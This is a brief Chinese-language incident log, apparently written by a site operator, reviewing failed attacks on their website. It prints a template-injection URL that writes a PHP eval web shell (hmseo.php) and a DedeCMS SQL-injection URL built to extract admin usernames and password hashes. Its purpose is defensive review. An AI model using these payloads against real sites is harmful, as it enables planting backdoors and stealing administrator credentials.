////原鏈接 https://www.****.org/?a=fetch&templateFile=public/index&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27hmseo.php%27,%27%3C?php%20@eval($_POST[hm]);?%3Ehmseo%27)%3C/php%3E%22%20%22Mozilla/4.0%20(compatible;%20MSIE%209.0;%20Windows%20NT%206.1) ///解析之后的鏈接 https://www.****.org/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php @eval($_POST[hm]);?>hmseo')</php>" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
在進行get訪問之后,黑客使用get,來進行訪問 hmseo.php
發現請求失敗,GET /hmseo.php HTTP/1.1" 404 573
后面使用下面的方法進行請求
https://www.****.org/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\x5C%27%20or%20mid=@`\x5C%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\x5C%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
后被攔截回顯403
估計方法失敗,然后使用工具進行大量POST請求
在POST將近100次之后,全是404, 隨后放棄